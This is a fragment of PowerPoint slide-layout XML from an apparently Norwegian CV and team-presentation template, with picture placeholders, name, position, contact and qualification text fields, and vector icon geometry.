              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A35C6582-F39A-4B73-81A7-121A1FB45F23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="21" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8050806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A445CDC2-DF9A-47D6-A238-5F9DA2DABFA9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="pic" sz="quarter" idx="22" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9777620" y="3884629"/>
            <a:ext cx="1220400" cy="1220400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="11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48" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DCFC3087-F475-4D08-B2ED-8827A4F7BD1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202413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49" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{643241A6-0350-4219-9985-41FC3CA1CA3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202413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0" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1503E89-2BBB-433A-98E9-B0E663EF6D2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07454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1" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F6D21BC-6196-4114-A756-2D202A53DA1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907454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2" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2ACCDC7-8E15-4003-A62A-676742715C2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30226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3" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9D0396A-C48A-46EB-865D-FFB53750AB1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30226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4" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{241C1CE6-77EF-468B-9272-B7785C1FC53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352573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5" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB33BEAB-AF53-4142-BEF8-53385DC1188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52573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56" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A83D61C-8C41-47D8-BF0E-11EACB666CD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050806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7" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{512AE17A-10D8-4E18-8092-FF50121AF4E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050806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58" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E742B94-7F5F-4C18-86E9-A3D80F40AD4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77620" y="3068101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59" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EA12DFE-F6CC-4CA7-988E-10D39B807F8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777620" y="3472325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nb-NO" noProof="0"/>
              <a:t>Stilling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9FD6E88-5F11-4000-BBED-F0AD99CD7F1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202413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1" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D6B63B9-CD51-4722-B671-88F97C20F6D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202413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nb-NO" noProof="0"/>
              <a:t>Stilling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16A082C5-AE9C-4DC2-9611-C0FD9F4A070D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2907454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3" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF338977-3CA1-4817-B8A8-A2BE57F4977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2907454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64" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9BBBE4-4AB3-4687-9D24-D0FE5EA56F4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630226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5" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83573C9A-36CF-4DCE-8885-EAE1CAF6ED63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352573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6" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D79C51DD-59BD-4845-B308-3BF61399E22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352573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67" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8D07509-6CE7-4368-A1FE-058FE115E24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8050806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68" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7BACA08-235B-4106-87EA-6E6FB55B74E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50806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69" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11FF43AF-518C-4F52-8344-349116F943A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9777620" y="5191419"/>
            <a:ext cx="1220400" cy="3600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100" b="1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Navn Etternavn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FF41A8F-B892-45E7-9A61-9993627B905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777620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nb-NO" noProof="0"/>
              <a:t>Stilling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:endParaRPr lang="nb-NO" noProof="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Plassholder for tekst 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1B197069-C91F-4F3C-BD87-CDCD1A61ED68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630226" y="5584256"/>
            <a:ext cx="1220400" cy="155626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000" b="0" baseline="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 algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1300"/>
            </a:lvl5pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Stilling</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="44" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B613A94-ECB0-4066-AB9C-04752EE0AD0A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415FAC1-3F49-4838-9260-63ABC6C0F3A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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="43" name="Connecteur droit 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA0EC5F2-14AD-4754-8F39-630DEC78D88B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12465934" y="10160"/>
            <a:ext cx="0" cy="559596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ZoneTexte 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9389EF61-40DB-44A8-A0C5-E858A44AECD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12526894" y="-76575"/>
            <a:ext cx="2836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For å endre bilde, slett nåværende bilde og klikk på ikonet for å hente nytt bilde fra ditt bibliotek.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="102615923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3496" y="514550"/>
            <a:ext cx="6844640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nb-NO" noProof="0"/>
              <a:t>Navn Etternavn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776AC9C5-F663-4627-B7EA-5298B5B4288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93825" y="2797442"/>
            <a:ext cx="3852000" cy="3308154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="72000" tIns="72000" rIns="72000" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr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9" name="Espace réservé du titre 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32CF3D1D-C78A-432A-8389-960DD1B1EF46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3234338" y="378021"/>
            <a:ext cx="1126663" cy="74773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4400" noProof="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>CV</a:t>
            </a:r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58F928AD-564A-4440-A28D-A2D0555B4513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19137" y="0"/>
            <a:ext cx="2084655" cy="2060705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="1400" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Calibri"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Klikk på ikonet for å legge til bilde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4BAFBC-AF57-4A30-B810-A67EAE58A073}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724899" y="2281289"/>
            <a:ext cx="2084655" cy="3278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100" b="1" noProof="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nøkkelkvalifikasjoner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BA8D544-3D30-4325-BF04-ADD7F126B488}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3301323" y="1161974"/>
            <a:ext cx="7976813" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="44450">
            <a:gradFill flip="none" rotWithShape="1">
              <a:gsLst>
                <a:gs pos="0">
                  <a:srgbClr val="D5121E"/>
                </a:gs>
                <a:gs pos="100000">
                  <a:srgbClr val="EF7D00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B04150E-9549-41CE-A658-FB1514381415}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="719136" y="3916520"/>
            <a:ext cx="2084655" cy="3278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100" b="1" noProof="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Relevante kurs og sertifiseringer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4F0CF95-D58C-4FCB-9D94-B0EC8441704C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7614974" y="2799925"/>
            <a:ext cx="3852000" cy="3308154"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="72000" tIns="72000" rIns="72000" bIns="0" rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="105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3" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7235F5D-B1DB-4701-A312-3A25AC0D35C4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3301321" y="1319165"/>
            <a:ext cx="3708000" cy="288000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400" b="1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Tittel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7315C25F-CF17-4241-B359-9415DDE5E4AC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3301321" y="1634891"/>
            <a:ext cx="3708000" cy="230004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100" b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Email-adresse</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Espace réservé du texte 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F917965A-4A85-4D25-B838-B50C029D6A0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301321" y="1885049"/>
            <a:ext cx="3708000" cy="230004"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="108000" tIns="0" rIns="108000" bIns="144000" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="1100" b="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/>
            </a:lvl2pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="nb-NO" noProof="0"/>
              <a:t>Telefonnummer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Groupe 187">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCEF558C-0A06-4630-9616-05A964FB5C7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919290" y="2355656"/>
            <a:ext cx="252505" cy="335472"/>
            <a:chOff x="771531" y="4554404"/>
            <a:chExt cx="375236" cy="437246"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Freeform 393">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F14325-3959-4953-86ED-047231126E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1531" y="4554404"/>
              <a:ext cx="375236" cy="437246"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1133 w 1311"/>
                <a:gd name="T1" fmla="*/ 0 h 1536"/>
                <a:gd name="T2" fmla="*/ 268 w 1311"/>
                <a:gd name="T3" fmla="*/ 0 h 1536"/>
                <a:gd name="T4" fmla="*/ 90 w 1311"/>
                <a:gd name="T5" fmla="*/ 177 h 1536"/>
                <a:gd name="T6" fmla="*/ 90 w 1311"/>
                <a:gd name="T7" fmla="*/ 437 h 1536"/>
                <a:gd name="T8" fmla="*/ 7 w 1311"/>
                <a:gd name="T9" fmla="*/ 521 h 1536"/>
                <a:gd name="T10" fmla="*/ 0 w 1311"/>
                <a:gd name="T11" fmla="*/ 537 h 1536"/>
                <a:gd name="T12" fmla="*/ 0 w 1311"/>
                <a:gd name="T13" fmla="*/ 1112 h 1536"/>
                <a:gd name="T14" fmla="*/ 23 w 1311"/>
                <a:gd name="T15" fmla="*/ 1134 h 1536"/>
                <a:gd name="T16" fmla="*/ 46 w 1311"/>
                <a:gd name="T17" fmla="*/ 1112 h 1536"/>
                <a:gd name="T18" fmla="*/ 46 w 1311"/>
                <a:gd name="T19" fmla="*/ 560 h 1536"/>
                <a:gd name="T20" fmla="*/ 282 w 1311"/>
                <a:gd name="T21" fmla="*/ 560 h 1536"/>
                <a:gd name="T22" fmla="*/ 460 w 1311"/>
                <a:gd name="T23" fmla="*/ 383 h 1536"/>
                <a:gd name="T24" fmla="*/ 460 w 1311"/>
                <a:gd name="T25" fmla="*/ 146 h 1536"/>
                <a:gd name="T26" fmla="*/ 1043 w 1311"/>
                <a:gd name="T27" fmla="*/ 146 h 1536"/>
                <a:gd name="T28" fmla="*/ 1175 w 1311"/>
                <a:gd name="T29" fmla="*/ 277 h 1536"/>
                <a:gd name="T30" fmla="*/ 1175 w 1311"/>
                <a:gd name="T31" fmla="*/ 489 h 1536"/>
                <a:gd name="T32" fmla="*/ 1197 w 1311"/>
                <a:gd name="T33" fmla="*/ 512 h 1536"/>
                <a:gd name="T34" fmla="*/ 1220 w 1311"/>
                <a:gd name="T35" fmla="*/ 489 h 1536"/>
                <a:gd name="T36" fmla="*/ 1220 w 1311"/>
                <a:gd name="T37" fmla="*/ 277 h 1536"/>
                <a:gd name="T38" fmla="*/ 1043 w 1311"/>
                <a:gd name="T39" fmla="*/ 100 h 1536"/>
                <a:gd name="T40" fmla="*/ 437 w 1311"/>
                <a:gd name="T41" fmla="*/ 100 h 1536"/>
                <a:gd name="T42" fmla="*/ 421 w 1311"/>
                <a:gd name="T43" fmla="*/ 107 h 1536"/>
                <a:gd name="T44" fmla="*/ 136 w 1311"/>
                <a:gd name="T45" fmla="*/ 392 h 1536"/>
                <a:gd name="T46" fmla="*/ 136 w 1311"/>
                <a:gd name="T47" fmla="*/ 177 h 1536"/>
                <a:gd name="T48" fmla="*/ 268 w 1311"/>
                <a:gd name="T49" fmla="*/ 46 h 1536"/>
                <a:gd name="T50" fmla="*/ 1133 w 1311"/>
                <a:gd name="T51" fmla="*/ 46 h 1536"/>
                <a:gd name="T52" fmla="*/ 1265 w 1311"/>
                <a:gd name="T53" fmla="*/ 177 h 1536"/>
                <a:gd name="T54" fmla="*/ 1265 w 1311"/>
                <a:gd name="T55" fmla="*/ 1295 h 1536"/>
                <a:gd name="T56" fmla="*/ 1219 w 1311"/>
                <a:gd name="T57" fmla="*/ 1376 h 1536"/>
                <a:gd name="T58" fmla="*/ 1220 w 1311"/>
                <a:gd name="T59" fmla="*/ 1359 h 1536"/>
                <a:gd name="T60" fmla="*/ 1220 w 1311"/>
                <a:gd name="T61" fmla="*/ 580 h 1536"/>
                <a:gd name="T62" fmla="*/ 1197 w 1311"/>
                <a:gd name="T63" fmla="*/ 557 h 1536"/>
                <a:gd name="T64" fmla="*/ 1175 w 1311"/>
                <a:gd name="T65" fmla="*/ 580 h 1536"/>
                <a:gd name="T66" fmla="*/ 1175 w 1311"/>
                <a:gd name="T67" fmla="*/ 1359 h 1536"/>
                <a:gd name="T68" fmla="*/ 1043 w 1311"/>
                <a:gd name="T69" fmla="*/ 1490 h 1536"/>
                <a:gd name="T70" fmla="*/ 177 w 1311"/>
                <a:gd name="T71" fmla="*/ 1490 h 1536"/>
                <a:gd name="T72" fmla="*/ 46 w 1311"/>
                <a:gd name="T73" fmla="*/ 1359 h 1536"/>
                <a:gd name="T74" fmla="*/ 46 w 1311"/>
                <a:gd name="T75" fmla="*/ 1203 h 1536"/>
                <a:gd name="T76" fmla="*/ 23 w 1311"/>
                <a:gd name="T77" fmla="*/ 1180 h 1536"/>
                <a:gd name="T78" fmla="*/ 0 w 1311"/>
                <a:gd name="T79" fmla="*/ 1203 h 1536"/>
                <a:gd name="T80" fmla="*/ 0 w 1311"/>
                <a:gd name="T81" fmla="*/ 1359 h 1536"/>
                <a:gd name="T82" fmla="*/ 177 w 1311"/>
                <a:gd name="T83" fmla="*/ 1536 h 1536"/>
                <a:gd name="T84" fmla="*/ 1043 w 1311"/>
                <a:gd name="T85" fmla="*/ 1536 h 1536"/>
                <a:gd name="T86" fmla="*/ 1205 w 1311"/>
                <a:gd name="T87" fmla="*/ 1431 h 1536"/>
                <a:gd name="T88" fmla="*/ 1311 w 1311"/>
                <a:gd name="T89" fmla="*/ 1295 h 1536"/>
                <a:gd name="T90" fmla="*/ 1311 w 1311"/>
                <a:gd name="T91" fmla="*/ 177 h 1536"/>
                <a:gd name="T92" fmla="*/ 1133 w 1311"/>
                <a:gd name="T93" fmla="*/ 0 h 1536"/>
                <a:gd name="T94" fmla="*/ 282 w 1311"/>
                <a:gd name="T95" fmla="*/ 514 h 1536"/>
                <a:gd name="T96" fmla="*/ 78 w 1311"/>
                <a:gd name="T97" fmla="*/ 514 h 1536"/>
                <a:gd name="T98" fmla="*/ 414 w 1311"/>
                <a:gd name="T99" fmla="*/ 178 h 1536"/>
                <a:gd name="T100" fmla="*/ 414 w 1311"/>
                <a:gd name="T101" fmla="*/ 383 h 1536"/>
                <a:gd name="T102" fmla="*/ 282 w 1311"/>
                <a:gd name="T103" fmla="*/ 514 h 1536"/>
                <a:gd name="T104" fmla="*/ 282 w 1311"/>
                <a:gd name="T105" fmla="*/ 514 h 1536"/>
                <a:gd name="T106" fmla="*/ 282 w 1311"/>
                <a:gd name="T107" fmla="*/ 514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1" h="1536">
                  <a:moveTo>
                    <a:pt x="1133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170" y="0"/>
                    <a:pt x="90" y="79"/>
                    <a:pt x="90" y="177"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="437"/>
                    <a:pt x="90" y="437"/>
                    <a:pt x="90" y="437"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="521"/>
                    <a:pt x="7" y="521"/>
                    <a:pt x="7" y="521"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="525"/>
                    <a:pt x="0" y="531"/>
                    <a:pt x="0" y="537"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1112"/>
                    <a:pt x="0" y="1112"/>
                    <a:pt x="0" y="1112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1124"/>
                    <a:pt x="10" y="1134"/>
                    <a:pt x="23" y="1134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="1134"/>
                    <a:pt x="46" y="1124"/>
                    <a:pt x="46" y="1112"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="560"/>
                    <a:pt x="46" y="560"/>
                    <a:pt x="46" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="282" y="560"/>
                    <a:pt x="282" y="560"/>
                    <a:pt x="282" y="560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="380" y="560"/>
                    <a:pt x="460" y="480"/>
                    <a:pt x="460" y="383"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="460" y="146"/>
                    <a:pt x="460" y="146"/>
                    <a:pt x="460" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1043" y="146"/>
                    <a:pt x="1043" y="146"/>
                    <a:pt x="1043" y="146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1116" y="146"/>
                    <a:pt x="1175" y="205"/>
                    <a:pt x="1175" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1175" y="489"/>
                    <a:pt x="1175" y="489"/>
                    <a:pt x="1175" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1175" y="502"/>
                    <a:pt x="1185" y="512"/>
                    <a:pt x="1197" y="512"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1210" y="512"/>
                    <a:pt x="1220" y="502"/>
                    <a:pt x="1220" y="489"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1220" y="277"/>
                    <a:pt x="1220" y="277"/>
                    <a:pt x="1220" y="277"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1220" y="180"/>
                    <a:pt x="1141" y="100"/>
                    <a:pt x="1043" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="437" y="100"/>
                    <a:pt x="437" y="100"/>
                    <a:pt x="437" y="100"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="431" y="100"/>
                    <a:pt x="425" y="103"/>
                    <a:pt x="421" y="107"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="392"/>
                    <a:pt x="136" y="392"/>
                    <a:pt x="136" y="392"/>
